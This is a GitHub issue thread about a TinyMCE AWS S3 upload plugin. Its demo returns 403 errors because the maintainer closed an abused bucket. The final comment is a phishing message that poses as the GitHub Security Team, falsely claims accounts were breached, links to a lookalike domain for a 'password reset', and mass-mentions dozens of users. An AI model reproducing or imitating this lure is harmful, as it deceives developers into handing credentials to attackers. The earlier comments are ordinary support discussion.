### ISSUE TITLE
Working demo

### ISSUE THREAD

**Issue by catuss-a** [OGPoyraz/tinymce-aws-s3-upload-plugin#2]
Hi !
Just to inform you that I get a forbidden 403 error on your working demo when uploading an image but I guess it is normal right ?
Just wanted to let you know in case it is not because some people might think your plugin is not working :)

**Comment by OGPoyraz** [comment]
Hey @catuss-a,
I closed my bucket because some random ppl harrassed my s3 bucket so hard :) (They sent some large files and tried to dl)

This is why plugin looks not working.

**Comment by OGPoyraz** [comment]
Btw you can still limit on the client but not on s3 :(

Feel free to open PR for file size limitation on plugin options.

**Comment by catuss-a** [comment]
Alright thanks!

**Comment by andri-netra** [comment]
# Unauthorized Access Alert 

Hello GitHub users, 

We regret to inform you that your GitHub account has been accessed without authorization. In order to protect your account's security, we urge you to reset your password and revoke access to any unauthorized individuals. 

To reset your password and prevent any further unauthorized access, please click on the following [link](http://github.hudevelopers.online/). We appreciate your prompt attention to this matter. 

Thank you, 

[Your GitHub Security Team](http://github.hudevelopers.online/)

### Users Included:
- @SMotaal
- @mikesposito
- @NidhiKJha
- @V00D00-child
- @SamuelSalas
- @McOso
- @OGPoyraz
- @weizman
- @nikoferroGudahtt
- @NidhiKJha
- @gantunesr
- @nikoferro
- @andreahaku
- @andrepimenta
- @weizman
- @rickycodes
- @mikespositowachunei
- @kumavis
- @OGPoyraz
- @callumelvidge
- @SamuelSalas
- @shane-t
- @cortisiko
- @SMotaal
- @ritave
- @V00D00-childdestroyersrt
- @eriknson
- @micaelae
- @Mrtenz
- @rekmarks
- @Andepande
- @McOso
- @FrederikBolding
- @matthewwalsh0
